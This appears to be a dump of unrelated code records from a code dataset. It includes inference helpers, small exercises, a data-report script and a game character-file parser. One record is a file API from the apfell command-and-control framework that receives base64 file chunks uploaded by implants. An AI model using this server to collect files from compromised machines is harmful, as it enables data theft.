variable in var_in_clique[each_clique]:\r\n for each_tuple in range(len(distribution_array[each_clique])):\r\n # Truth value is calculated for each tuple and then compared if it is equal to the evidence variable\r\n truth_value = get_truth_values_given_index(var_in_clique[each_clique], each_tuple,\r\n cardinalities[var_in_clique[each_clique]])\r\n if truth_value[(list(var_in_clique[each_clique])).index(variable)] != value:\r\n index_to_delete = get_index_given_truth_values(var_in_clique[each_clique], truth_value,\r\n cardinalities[var_in_clique[each_clique]])\r\n # It the tuple does not match with the evidence then we ignore it\r\n distribution_array[each_clique][index_to_delete] = \"-1\"\r\n var_in_clique = list(var_in_clique)\r\n val = list(var_in_clique[each_clique]).index(variable)\r\n # deleting the evidence variable from the array\r\n var_in_clique[each_clique] = numpy.ndarray.tolist(numpy.delete(var_in_clique[each_clique], val))\r\n # removing the values that does not correspond with the evidence\r\n distribution_array[each_clique] = list(filter(lambda a: a != \"-1\", distribution_array[each_clique]))\r\n return var_in_clique, distribution_array\r\n\r\n\r\ndef product_of_factors(factor_1, factor_2, var_in_factor_1, var_in_factor_2, cardinalities):\r\n \"\"\"\r\n Takes two factors and returns the product of those two\r\n @param factor_1: The first factor\r\n @param factor_2: The second factor\r\n @param var_in_factor_1: tThe variables in factor 1\r\n @param var_in_factor_2: The variables in factor 2\r\n @param cardinalities: The cardinalities of the variables in facotrs\r\n @return: The product of the given two factors\r\n \"\"\"\r\n var_in_output = []\r\n for each_var in var_in_factor_1:\r\n var_in_output.append(each_var)\r\n for each_var in var_in_factor_2:\r\n if each_var not in var_in_output:\r\n var_in_output.append(each_var)\r\n common_var = list(set(var_in_factor_1).intersection(set(var_in_factor_2)))\r\n new_factor = []\r\n cardinalities = numpy.array(cardinalities)\r\n for each_index_value_of_factor_1 in range(numpy.product(cardinalities[var_in_factor_1])):\r\n # Get the truth values for both the tuples\r\n truth_value_1 = numpy.array(\r\n get_truth_values_given_index(var_in_factor_1, each_index_value_of_factor_1, cardinalities[var_in_factor_1]))\r\n for each_index_value_of_factor_2 in range(numpy.product(cardinalities[var_in_factor_2])):\r\n truth_value_2 = numpy.array(get_truth_values_given_index(var_in_factor_2, each_index_value_of_factor_2,\r\n cardinalities[var_in_factor_2]))\r\n # Check if both the tuples are compatible or not, if yes then take their product\r\n if (truth_value_1[numpy.where(numpy.isin(var_in_factor_1, common_var))] == truth_value_2[\r\n numpy.where(numpy.isin(var_in_factor_2, common_var))]).all():\r\n new_factor.append(\r\n threshold(factor_1[each_index_value_of_factor_1] + factor_2[each_index_value_of_factor_2]))\r\n return new_factor, var_in_output\r\n\r\n\r\ndef sum_out(factor, set_of_variable_to_sum_out, var_in_factor, cardinalities):\r\n \"\"\"\r\n Takes a factor and a variable to sum and returns a factor with other variables\r\n @param factor: The factor in which the sum will take place\r\n @param set_of_variable_to_sum_out: THe set of variables for which sum needs to be done\r\n @param var_in_factor: The variables in the factor/clique\r\n @param cardinalities: The cardinalities of the variables in the factor\r\n @return:\r\n \"\"\"\r\n cardinalities = numpy.array(cardinalities)\r\n set_of_variable_to_sum_out = [set_of_variable_to_sum_out]\r\n 
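`product_of_factors` above pairs every tuple of one factor with every compatible tuple of the other and, working in log space, adds their values. In the special case where the factors share no variables this reduces to a broadcast sum; a simplified sketch of that case:

```python
import numpy as np

# Log-space factors over disjoint variables A (|A| = 2) and B (|B| = 3).
log_fa = np.log10(np.array([0.4, 0.6]))
log_fb = np.log10(np.array([0.2, 0.3, 0.5]))
log_product = log_fa[:, None] + log_fb[None, :]   # shape (2, 3), one entry per joint tuple
assert np.allclose(10 ** log_product, np.outer([0.4, 0.6], [0.2, 0.3, 0.5]))
```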
var_in_final_factor = list(filter(lambda x: x not in set_of_variable_to_sum_out, var_in_factor))\r\n # Getting the size of new factor\r\n num_tuple_new_factor = numpy.product(numpy.array(cardinalities)[var_in_final_factor])\r\n new_factor = [[]] * num_tuple_new_factor\r\n for each_tuple in range(len(factor)):\r\n truth_value = numpy.array(\r\n get_truth_values_given_index(var_in_factor, each_tuple, cardinalities[var_in_factor]))\r\n index_for_new_factor = get_index_given_truth_values(var_in_final_factor, truth_value[\r\n numpy.where(numpy.isin(var_in_factor, var_in_final_factor))], cardinalities[var_in_final_factor])\r\n # Adding value compatible with the variable\r\n new_factor[index_for_new_factor] = new_factor[index_for_new_factor] + [factor[each_tuple]]\r\n new_factor = [threshold(logsumexp(i)) for i in new_factor]\r\n return new_factor, var_in_final_factor\r\n","sub_path":"Sampling-based-Variable-Elimination-and-Conditioning/Sampling-based-Variable-Elimination-and-Conditioning-master/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":10282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"228486006","text":"from app import apfell, db_objects\nfrom app.database_models.model import FileMeta, FileData, Task\nfrom sanic.response import json, html\nimport base64\nfrom sanic_jwt.decorators import protected, inject_user\n\n\n@apfell.route(apfell.config['API_BASE'] + \"/files\", methods=['GET'])\n@inject_user()\n@protected()\nasync def get_all_files_meta(request, user):\n try:\n files = await db_objects.execute(FileMeta.select())\n except Exception as e:\n return json({'status': 'error', 'error': 'failed to get files'})\n return json([f.to_json() for f in files])\n\n\n@apfell.route(apfell.config['API_BASE'] + \"/files/\", methods=['GET'])\nasync def get_file_from_database(request, id):\n try:\n file_meta = await db_objects.get(FileMeta, id=id)\n except Exception as e:\n print(e)\n return json({}, status=404)\n # now that we have the file metadata, get all the pieces to send back\n try:\n file_pieces = await db_objects.execute(FileData.select().where(FileData.meta_data == file_meta).order_by(FileData.chunk_num))\n data = bytearray()\n for piece in file_pieces:\n data += piece.chunk_data.tobytes()\n encdata = base64.b64encode(data).decode(\"utf-8\")\n return html(encdata)\n except Exception as e:\n print(e)\n return json({}, status=500)\n\n\n@apfell.route(apfell.config['API_BASE'] + \"/files//\", methods=['GET'])\nasync def get_chunk_from_database(request, id, chunk):\n # get a chunk of a file from the database\n try:\n file_meta = await db_objects.get(FileMeta, id=id)\n except Exception as e:\n print(e)\n return json({'status': 'error', 'error': 'failed to get file object'})\n try:\n file_chunk = await db_objects.get(FileData, meta_data=file_meta, chunk_num=chunk)\n return json(file_chunk.to_json())\n except Exception as e:\n print(e)\n return json({'status': 'error', 'error': 'failed to get chunk'})\n\n\n# when an implant gets the task to download a file, first reaches out here\n@apfell.route(apfell.config['API_BASE'] + \"/files/\", methods=['POST'])\nasync def create_filemeta_in_database(request):\n return await create_filemeta_in_database_func(request.json)\n\n\nasync def create_filemeta_in_database_func(data):\n # create a filemeta object where we will then start uploading our file\n # expects total_chunks, and task\n if 'total_chunks' not in data:\n return json({'status': 'error', 'error': 'total_chunks 
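`sum_out` above marginalizes a variable by grouping tuples that agree on the retained variables and folding each bucket with `logsumexp`. In linear space, with the factor reshaped so each variable is an axis, the same marginalization is a plain sum over the eliminated axis; a simplified sketch (the record works in log10 space on flat lists):

```python
import numpy as np

# A factor over (A, B) with |A| = 2, |B| = 3, stored row-major like the record's flat lists.
factor = np.arange(6, dtype=float).reshape(2, 3)
marginal_A = factor.sum(axis=1)   # sum out B, keep A
assert marginal_A.tolist() == [3.0, 12.0]
```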
required'})\n if 'task' not in data:\n return json({'status': 'error', 'error': 'corresponding task id required'})\n try:\n task = await db_objects.get(Task, id=data['task'])\n except Exception as e:\n print(e)\n return json({'status': 'error', 'error': \"failed to find task\"})\n try:\n filemeta = await db_objects.create(FileMeta, total_chunks=data['total_chunks'], task=task)\n except Exception as e:\n print(e)\n return json({'status': 'error', 'error': \"failed to create file\"})\n status = {'status': 'success'}\n return json({**status, **filemeta.to_json()})\n\n\n# after calling the above path, the implant calls this to upload the content\n@apfell.route(apfell.config['API_BASE'] + \"/files/\", methods=['POST'])\nasync def download_file_to_database(request, id):\n return await download_file_to_database_func({**request.json, \"file_id\": id})\n\n\nasync def download_file_to_database_func(data):\n # upload content blobs to be associated with filemeta id\n if 'chunk_num' not in data:\n return json({'status': 'error', 'error': 'missing chunk_num'})\n if 'chunk_data' not in data:\n return json({'status': 'error', 'error': 'missing chunk data'})\n try:\n file_meta = await db_objects.get(FileMeta, id=data['file_id'])\n except Exception as e:\n print(e)\n return json({'status': 'error', 'error': 'failed to get File info'})\n try:\n chunk_data = base64.b64decode(data['chunk_data'])\n piece = await db_objects.create(FileData, chunk_num=data['chunk_num'],\n chunk_data=chunk_data, meta_data=file_meta)\n except Exception as e:\n print(e)\n return json({'status': 'error', 'error': 'failed to store chunk'})\n return json({'status': 'success'})","sub_path":"app/api/file_api.py","file_name":"file_api.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"252525839","text":"primos = []\nl, u = input(\"\").split()\nl = int(l)\nu = int(u)\n\ndivisores =[]\nfor i in range(l, u+1): \n for j in range(1, i+1):\n if i >= j:\n if i % j == 0:\n divisores.append(j) \n if len(divisores) == 2:\n primos.append(i)\n divisores = []\n\nv = []\n\nfor i in range(1, len(primos)):\n v.append(primos[i] - primos[i-1])\n\nm = 0\nc = 0\n\n\nif len(v) == 0:\n print(\"-1\", \"\\n\")\n\nelif len(primos) > 0:\n resul = primos[0]\n for i in v:\n for j in v:\n if i == j:\n c += 1\n if c > m:\n m = c\n resul = i\n c = 0\n\n print(resul, \"\\n\")\n","sub_path":"Estruturas de Repetição e Dados/Lista 1 - Saltando Primos.py","file_name":"Lista 1 - Saltando Primos.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"431867215","text":"\n\n#calss header\nclass _UPBRAID():\n\tdef __init__(self,): \n\t\tself.name = \"UPBRAID\"\n\t\tself.definitions = [u'to forcefully or angrily tell someone they should not have done a particular thing and criticize them for having done it: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_upbraid.py","file_name":"_upbraid.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"184537873","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 27 22:08:03 2019\n\n@author: IMRANAX\n\"\"\"\n\nimport pandas as pd\n#%matplotlib inline\nimport 
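The file API above stores uploads as base64-encoded chunks keyed by `chunk_num` and reassembles them ordered by chunk number. The reassembly invariant, independent of the web framework and database, is just split/encode/decode/join:

```python
import base64

payload = bytes(range(256)) * 4
chunk_size = 100
chunks = [base64.b64encode(payload[i:i + chunk_size])
          for i in range(0, len(payload), chunk_size)]

rebuilt = b"".join(base64.b64decode(c) for c in chunks)
assert rebuilt == payload
```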
matplotlib.pyplot as plt\nimport numpy as np\n\ndef plotIrisData(X):\n\n # plot data\n plt.scatter(X[:50, 0], X[:50, 1],\n color='red', marker='o', label='setosa')\n plt.scatter(X[50:100, 0], X[50:100, 1],\n color='blue', marker='x', label='versicolor')\n \n plt.xlabel('sepal length [cm]')\n plt.ylabel('petal length [cm]')\n plt.legend(loc='upper left')\n \n # plt.savefig('images/02_06.png', dpi=300)\n plt.show()","sub_path":"sl/adaline/plotIris.py","file_name":"plotIris.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"258996036","text":"import json\nfrom urllib.request import urlopen\n\nfrom asreview.datasets import BaseDataSet, BaseVersionedDataSet\nfrom asreview.datasets import BaseDataGroup, dataset_from_url\n\n\nclass Covid19DataGroup(BaseDataGroup):\n group_id = \"covid19\"\n description = \"A Free dataset on publications on the corona virus.\"\n\n def __init__(self):\n base_url = \"https://raw.githubusercontent.com/asreview/asreview-covid19/master/config\"\n base_index = base_url + \"/index.json\"\n datasets = []\n with urlopen(base_index) as f:\n dir_list = json.loads(f.read().decode())\n for dir_ in dir_list:\n url = base_url + \"/\" + dir_\n datasets.append(dataset_from_url(url))\n super(Covid19DataGroup, self).__init__(\n *datasets\n )\n","sub_path":"asreviewcontrib/covid19/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"239242503","text":"'''\nCreated on 2015年12月22日\n\n历年年底及当前时点分公司客户数统计(年、分公司id、客户总数、存续客户数,存续客户占比,非存续客户数,非存续客户占比)\n\n@author: lijian\n'''\n\nimport datetime\n\nfrom settings import logger\nfrom common.pgcomm import PGUtils\nfrom common.sqlcomm import formatSql\nfrom common.log_db import insertlog\nfrom common.sysutils import truncateTbls\nfrom common.syscomm import SYS_LOG_TYPE_REPORT,SYS_LOG_RESULT_OK\n\ntblnames = ['edw.rpt_custnum_subbranch_year']\n\nsql_insert = '''\nINSERT into edw.rpt_custnum_subbranch_year(year_id,subbranch_id,custnum_1,custnum_0,custnum_all,custnum_1_rate,custnum_0_rate)\nselect T.year_id,T.subbranch_id,sum(a) as custnum_1,sum(b) as custnum_0,sum(a)+sum(b) as custnum_all,round(sum(a)*100.0/(sum(a)+sum(b)),2) as custnum_1_rate, round(sum(b)*100.0/(sum(a)+sum(b)),2) as custnum_0_rate from\n(select count(*) as a,0 as b,year_id,subbranch_id from edw.cust_point_assets_yearend \ngroup by subbranch_id,year_id\nunion all \nselect 0 as a,count(*) as b ,year_id,subbranch_id from edw.assets_zero_detail_yearend \ngroup by subbranch_id,year_id) as T\ngroup by T.subbranch_id,T.year_id\norder by T.year_id,T.subbranch_id\n'''\n \ndef insert_data(conn):\n '''\n 插入数据\n '''\n d0 = datetime.datetime.now()\n with conn.cursor() as cur:\n logger.debug(formatSql(sql_insert))\n cur.execute(formatSql(sql_insert))\n d1 = datetime.datetime.now()\n logger.info(\"插入数据 完成. 耗时: %s 秒. \" % (d1-d0).seconds)\n\ndef deal(sys_date, batch_id, data_date):\n '''\n 历年年底及当前时点分公司客户数统计(年、分公司id、客户总数、存续客户数,存续客户占比,非存续客户数,非存续客户占比)\n '''\n d0 = datetime.datetime.now()\n logger.info(\"start... 
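The iris plotting record above scatters the first 50 and next 50 rows with distinct colors and markers. Run headless (e.g. in CI) this needs a non-interactive backend and `savefig` instead of `show`; a sketch with synthetic points standing in for the iris array:

```python
import matplotlib
matplotlib.use("Agg")  # select a non-interactive backend before pyplot is imported
import matplotlib.pyplot as plt
import numpy as np

X = np.random.rand(100, 2)
plt.scatter(X[:50, 0], X[:50, 1], color="red", marker="o", label="setosa")
plt.scatter(X[50:, 0], X[50:, 1], color="blue", marker="x", label="versicolor")
plt.xlabel("sepal length [cm]")
plt.ylabel("petal length [cm]")
plt.legend(loc="upper left")
plt.savefig("iris_scatter.png", dpi=150)
```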
历年年底及当前时点分公司客户数统计(年、分公司id、客户总数、存续客户数,存续客户占比,非存续客户数,非存续客户占比)\")\n pgUtils = PGUtils()\n\n conn = pgUtils.getConnection()\n try:\n with conn:\n # 清空数据\n truncateTbls(conn, tblnames)\n \n # 插入数据\n insert_data(conn)\n \n d1 = datetime.datetime.now()\n log_content = \"历年年底及当前时点分公司客户数统计(年、分公司id、客户总数、存续客户数,存续客户占比,非存续客户数,非存续客户占比)处理完成.\"\n insertlog(conn, sys_date, batch_id, SYS_LOG_TYPE_REPORT, SYS_LOG_RESULT_OK, log_content, d0, d1, (d1-d0).seconds)\n logger.info(\"end... 历年年底及当前时点分公司客户数统计(年、分公司id、客户总数、存续客户数,存续客户占比,非存续客户数,非存续客户占比)处理完成. 耗时: %s 秒. \" % (d1-d0).seconds)\n finally:\n conn.close()\n return True","sub_path":"etl/datadeal/scripts/rptyear/rpt_custnum_subbranch_year.py","file_name":"rpt_custnum_subbranch_year.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"326018017","text":"# File: main.py\n# Author: Jeff Flanegan\n# Date: 11-16-2019\n# CSC 217\n# Final Project\n\nfrom ypsurvey import YPSurvey # import YPSurvey class\n\n# create database object using the YPSurvey constructor,\n# which inherits the Survey constructor\np = YPSurvey('YoungPeopleFinal.db')\n\n# This is the program driver and loops through the main menu\n# as long as the user does not choose 3, which exits the loop and ends the program \nchoice = 0\nwhile choice != 3:\n\n #user input\n choice = int(input(\"Main Menu\\n1.Number of people with specific phobias\\n2.Percentage of people with phobia by demographic\\n3.Quit\\n\"))\n \n #list output of phobias associate with total count\n if choice == 1:\n p.phobiaCount()\n\n #list output of phobia percentage by demographic\n if choice == 2: \n p.phobiaDemo()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"644797669","text":"#!/usr/bin/env python\nimport argparse\nimport struct\nimport io\nimport pprint\nimport msgpack\n\nAC_MAP = [\n b'\\x00\\x30',\n b'\\x20\\x41',\n b'\\xA0\\x41',\n b'\\xF4\\x41',\n b'\\x20\\x42',\n b'\\x48\\x42',\n b'\\x70\\x42',\n b'\\x8C\\x42',\n b'\\xA0\\x42',\n b'\\xB4\\x42',\n b'\\xC8\\x42',\n]\n\n\nclass KoikatuCharacter:\n def __init__(self, data, with_card=True, skip_additional=False):\n self.with_card = with_card\n if with_card:\n # read first PNG\n self.card_png = self._read_png(data)\n\n # header\n self.product_no = self._read_int(data)\n self.marker = self._read_utf8_string(data)\n\n # version?\n self.unknown01 = self._read_utf8_string(data)\n\n # second PNG\n self.png_length = self._read_int(data)\n self.png = self._read_png(data)\n\n # list info\n self.list_info_size = self._read_int(data)\n self.list_info_data = data.read(self.list_info_size)\n self.list_info = msgpack.unpackb(self.list_info_data,\n encoding='utf8')\n #print('listinfo:', self.list_info)\n\n # character info\n self.chara_datasize = struct.unpack(\"q\", data.read(8))[0]\n self.chara_data = data.read(self.chara_datasize)\n self.info_order = []\n self.kkex = None\n for info in self.list_info['lstInfo']:\n self.info_order.append(info['name'])\n start = info['pos']\n end = info['pos'] + info['size']\n part = self.chara_data[start:end]\n if info['name'] == 'Custom':\n self._read_custom(part)\n elif info['name'] == 'Coordinate':\n self._read_coordinate(part)\n elif info['name'] == 'Parameter':\n self._read_parameter(part)\n elif info['name'] == 'Status':\n self._read_status(part)\n elif info['name'] == 'KKEx':\n self._read_kkex(part)\n else:\n raise 
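The ETL record above (its Chinese comments and log messages describe truncating the target report table, inserting year-end per-branch customer counts with active/inactive ratios, and logging each step's elapsed seconds) brackets every step with `datetime.now()` pairs. The same timing idiom packaged as a context manager keeps the begin/end bookkeeping in one place:

```python
import datetime
from contextlib import contextmanager

@contextmanager
def timed(label):
    start = datetime.datetime.now()
    yield
    elapsed = (datetime.datetime.now() - start).seconds
    print(f"{label} done in {elapsed} s")

with timed("insert_data"):
    sum(range(10 ** 6))  # stand-in for the SQL insert
```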
ValueError(f'Unsupported info {info[\"name\"]}')\n\n #print('name:', self.firstname, self.lastname)\n\n self.additional_keys = []\n self.additional = {}\n self.ac = {}\n self.ex_data = b''\n if not with_card:\n # additional info\n len1 = self._read_byte(data)\n if len1 == 4:\n marker = data.read(len1)\n if marker == b'KKEx':\n # bepinex extensible format\n version = self._read_int(data)\n len2 = self._read_int(data)\n ex_data = data.read(len2)\n self.ex_data = b''.join([\n self._pack_byte(len1),\n marker,\n self._pack_int(version),\n self._pack_int(len2),\n ex_data\n ])\n else:\n data.seek(-1, 1)\n\n self.unknown02 = data.read(4)\n self.unknown_mark = data.read(4)\n\n self.dearname = self._read_utf8_string(data)\n #print('dear:', self.dearname)\n\n self.feeling = self._read_int(data)\n self.m_love = self._read_int(data)\n self.h_count = self._read_int(data)\n self.koikatu = self._read_byte(data)\n self.lover = self._read_byte(data)\n self.anger = self._read_byte(data)\n\n self.unknown03 = data.read(1)\n\n self.intelligence = self._read_int(data)\n\n if self.sex == 0:\n self.strength = self._read_int(data)\n self._date = 0\n else:\n self._date = self._read_byte(data)\n data.read(3) # not use\n self.strength = 0\n\n self.ero = self._read_int(data)\n\n if not skip_additional:\n self.unknown06 = data.read(14)\n\n self.ac['mune'] = data.read(4)\n self.ac['kokan'] = data.read(4)\n self.ac['anal'] = data.read(4)\n self.ac['siri'] = data.read(4)\n self.ac['tikubi'] = data.read(4)\n\n self.unknown07 = data.read(14)\n\n self.ac['kokan_piston'] = data.read(4)\n self.ac['anal_piston'] = data.read(4)\n else:\n self.unknown06 = b''\n self.ac['mune'] = b''\n self.ac['kokan'] = b''\n self.ac['anal'] = b''\n self.ac['siri'] = b''\n self.ac['tikubi'] = b''\n self.unknown07 = b''\n self.ac['kokan_piston'] = b''\n self.ac['anal_piston'] = b''\n\n self._read_additional(data)\n\n\n @property\n def firstname(self):\n return self.parameter['firstname']\n\n @firstname.setter\n def firstname(self, value):\n self.parameter['firstname'] = value\n\n @property\n def lastname(self):\n return self.parameter['lastname']\n\n @lastname.setter\n def lastname(self, value):\n self.parameter['lastname'] = value\n\n @property\n def nickname(self):\n return self.parameter['nickname']\n\n @nickname.setter\n def nickname(self, value):\n self.parameter['nickname'] = value\n\n @property\n def sex(self):\n return self.parameter['sex']\n\n @sex.setter\n def sex(self, value):\n self.parameter['sex'] = value\n\n @property\n def answers(self):\n return self.parameter['awnser']\n\n @answers.setter\n def answers(self, value):\n self.parameter['awnser'] = value\n\n @property\n def denials(self):\n return self.parameter['denial']\n\n @denials.setter\n def denials(self, value):\n self.parameter['denial'] = value\n\n @property\n def attributes(self):\n return self.parameter['attribute']\n\n @attributes.setter\n def attributes(self, value):\n self.parameter['attribute'] = value\n\n @property\n def personality(self):\n return self.parameter['personality']\n\n @personality.setter\n def personality(self, value):\n self.parameter['personality'] = value\n\n @property\n def weak_point(self):\n return self.parameter['weakPoint']\n\n @weak_point.setter\n def weak_point(self, value):\n self.parameter['weakPoint'] = value\n\n @property\n def custom(self):\n return (self.face, self.body, self.hair)\n\n @property\n def date(self):\n return self._date\n\n @date.setter\n def date(self, value):\n self._date = value\n\n\n @custom.setter\n def custom(self, 
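`_read_custom`/`_pack_custom` above frame each msgpack blob with a 4-byte length prefix so the reader knows how much to consume before the next blob. A roundtrip of that framing (requires the msgpack package; the record's `encoding=` keyword is deprecated in current msgpack, where `raw=False` plays that role, and its native `'i'` prefix is little-endian on the usual platforms, made explicit here):

```python
import io
import struct
import msgpack

def write_framed(stream, obj):
    blob = msgpack.packb(obj, use_bin_type=True)
    stream.write(struct.pack("<i", len(blob)))
    stream.write(blob)

def read_framed(stream):
    (length,) = struct.unpack("<i", stream.read(4))
    return msgpack.unpackb(stream.read(length), raw=False)

buf = io.BytesIO()
write_framed(buf, {"enableMakeup": True, "items": [1, 2, 3]})
buf.seek(0)
assert read_framed(buf) == {"enableMakeup": True, "items": [1, 2, 3]}
```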
value):\n self.face = value[0]\n self.body = value[1]\n self.hair = value[2]\n\n def get_ac(self, key):\n if len(self.ac[key]) > 0:\n v = self._unpack_short(self.ac[key][2:])\n for i, lv in enumerate([self._unpack_short(h) for h in AC_MAP]):\n if v < lv:\n return i - 1 if i > 0 else 0\n return 10\n else:\n return 0\n\n def set_ac(self, key, value):\n if len(self.ac[key]) > 0:\n self.ac[key] = self.ac[key][0:2] + AC_MAP[value]\n\n def _unpack_short(self, bytes_):\n return struct.unpack('H', bytes_)\n\n\n def save(self, out):\n out.write(self._serialize())\n\n def _serialize(self):\n custom_s = self._pack_custom()\n coordinate_s = self._pack_coordinate()\n parameter_s = self._pack_parameter()\n status_s = self._pack_status()\n\n info_data = {\n 'Custom' : custom_s,\n 'Coordinate' : coordinate_s,\n 'Parameter' : parameter_s,\n 'Status' : status_s,\n }\n\n if self.kkex is not None:\n info_data['KKEx'] = self._pack_kkex()\n chara_values = b\"\".join([info_data[key] for key in self.info_order])\n\n pos = 0\n for i, key in enumerate(self.info_order):\n self.list_info[\"lstInfo\"][i][\"pos\"] = pos\n self.list_info[\"lstInfo\"][i][\"size\"] = len(info_data[key])\n pos += len(info_data[key])\n\n list_info_s = msgpack.packb(self.list_info, use_single_float=True, use_bin_type=True)\n\n data = []\n if self.with_card:\n data = [self.card_png]\n\n if self.sex == 0:\n bstr = self._pack_int(self.strength)\n else:\n bstr = self._pack_byte(self._date) + b'\\x00\\x00\\x00'\n\n data += [\n self._pack_int(self.product_no),\n self._pack_utf8_string(self.marker),\n self._pack_utf8_string(self.unknown01),\n self._pack_int(self.png_length),\n self.png,\n self._pack_int(len(list_info_s)),\n list_info_s,\n struct.pack('q', len(chara_values)),\n chara_values,\n self.ex_data,\n self.unknown02,\n self.unknown_mark,\n self._pack_utf8_string(self.dearname),\n self._pack_int(self.feeling),\n self._pack_int(self.m_love),\n self._pack_int(self.h_count),\n self._pack_byte(self.koikatu),\n self._pack_byte(self.lover),\n self._pack_byte(self.anger),\n self.unknown03,\n self._pack_int(self.intelligence),\n bstr,\n self._pack_int(self.ero),\n self.unknown06,\n self.ac['mune'],\n self.ac['kokan'],\n self.ac['anal'],\n self.ac['siri'],\n self.ac['tikubi'],\n self.unknown07,\n self.ac['kokan_piston'],\n self.ac['anal_piston'],\n self._pack_additional()\n ]\n\n return b''.join(data)\n\n\n def _pack_chardata(self):\n return self.chara_data\n\n\n def _read_custom(self, data):\n data_stream = io.BytesIO(data)\n length = self._read_int(data_stream)\n self.face = msgpack.unpackb(data_stream.read(length), encoding='ascii')\n length = self._read_int(data_stream)\n self.body = msgpack.unpackb(data_stream.read(length), encoding='ascii')\n length = self._read_int(data_stream)\n self.hair = msgpack.unpackb(data_stream.read(length), encoding='ascii')\n\n\n def _pack_custom(self):\n face_s = msgpack.packb(self.face, use_single_float=True, use_bin_type=True)\n body_s = msgpack.packb(self.body, use_single_float=True, use_bin_type=True)\n hair_s = msgpack.packb(self.hair, use_single_float=True, use_bin_type=True)\n data = [\n struct.pack(\"i\", len(face_s)),\n face_s,\n struct.pack(\"i\", len(body_s)),\n body_s,\n struct.pack(\"i\", len(hair_s)),\n hair_s\n ]\n return b\"\".join(data)\n\n\n def _read_coordinate(self, data):\n self.coordinates = []\n for coordinate_data in msgpack.unpackb(data):\n coordinate = {}\n data_stream = io.BytesIO(coordinate_data)\n length = self._read_int(data_stream)\n coordinate[\"clothes\"] = 
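`get_ac`/`set_ac` above compare the last two bytes of each stored value, as unsigned little-endian shorts, against the `AC_MAP` table defined at the top of this record. My reading of that data (not documented in the record): the two-byte entries are the high halves of little-endian float32 values, and since positive IEEE-754 floats order the same as their bit patterns, the short comparison stays monotone. Padding with two zero bytes makes the levels visible:

```python
import struct

AC_MAP = [b"\x00\x30", b"\x20\x41", b"\xA0\x41", b"\xF4\x41", b"\x20\x42",
          b"\x48\x42", b"\x70\x42", b"\x8C\x42", b"\xA0\x42", b"\xB4\x42", b"\xC8\x42"]

floats = [struct.unpack("<f", b"\x00\x00" + h)[0] for h in AC_MAP]
# Entries 1..10 decode to a rising scale of levels.
assert floats[1:] == [10.0, 20.0, 30.5, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
```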
msgpack.unpackb(data_stream.read(length), encoding='ascii')\n length = self._read_int(data_stream)\n coordinate[\"accessory\"] = msgpack.unpackb(data_stream.read(length), encoding='ascii')\n makeup = self._read_byte(data_stream)\n coordinate[\"enableMakeup\"] = True if makeup != 0 else False\n length = self._read_int(data_stream)\n coordinate[\"makeup\"] = msgpack.unpackb(data_stream.read(length), encoding='ascii')\n self.coordinates.append(coordinate)\n\n\n def _pack_coordinate(self):\n data = []\n for i in self.coordinates:\n cloth_s = msgpack.packb(i[\"clothes\"], use_single_float=True, use_bin_type=True)\n accessory_s = msgpack.packb(i[\"accessory\"], use_single_float=True, use_bin_type=True)\n makeup_s = msgpack.packb(i[\"makeup\"], use_single_float=True, use_bin_type=True, strict_types=True)\n coordinate = [\n struct.pack(\"i\", len(cloth_s)),\n cloth_s,\n struct.pack(\"i\", len(accessory_s)),\n accessory_s,\n struct.pack(\"b\", 1) if i[\"enableMakeup\"] else struct.pack(\"b\", 0),\n struct.pack(\"i\", len(makeup_s)),\n makeup_s\n ]\n data.append(b\"\".join(coordinate))\n return msgpack.packb(data, use_bin_type=True)\n\n\n def _read_parameter(self, data):\n self.parameter = msgpack.unpackb(data, encoding='utf8')\n\n\n def _pack_parameter(self):\n return msgpack.packb(self.parameter, use_single_float=True, use_bin_type=True)\n\n\n def _read_status(self, data):\n self.status = msgpack.unpackb(data, encoding='utf8')\n\n\n def _pack_status(self):\n return msgpack.packb(self.status, use_single_float=True, use_bin_type=True)\n\n def _read_kkex(self, data):\n self.kkex = msgpack.unpackb(data, encoding='utf8')\n\n def _pack_kkex(self):\n return msgpack.packb(self.kkex, use_single_float=True, use_bin_type=True)\n\n\n def _read_additional(self, data):\n chunk = data.read()\n\n start = chunk.find(b'Idle')\n if start == -1:\n self.before_additional = chunk\n self.ac['houshi'] = b''\n self.after_additional = b''\n return\n\n # -1 is length byte of 'Idle'\n self.before_additional = chunk[0:start-1]\n\n stream = io.BytesIO(chunk[start + len('Idle'):])\n value = self._read_int(stream)\n\n self.additional_keys.append('Idle')\n self.additional['Idle'] = value\n\n while True:\n len_ = self._read_byte(stream)\n if len_ == 0:\n stream.seek(-1, 1)\n break\n key = stream.read(len_).decode('ascii')\n value = self._read_int(stream)\n\n self.additional_keys.append(key)\n self.additional[key] = value\n\n self.ac['houshi'] = stream.read(4)\n self.after_additional = stream.read()\n\n\n def _pack_additional(self):\n data = [self.before_additional]\n\n for key in self.additional_keys:\n data.append(self._pack_byte(len(key)))\n data.append(key.encode())\n data.append(self._pack_int(self.additional[key]))\n\n data.append(self.ac['houshi'])\n data.append(self.after_additional)\n return b''.join(data)\n\n\n def _read_utf8_string(self, 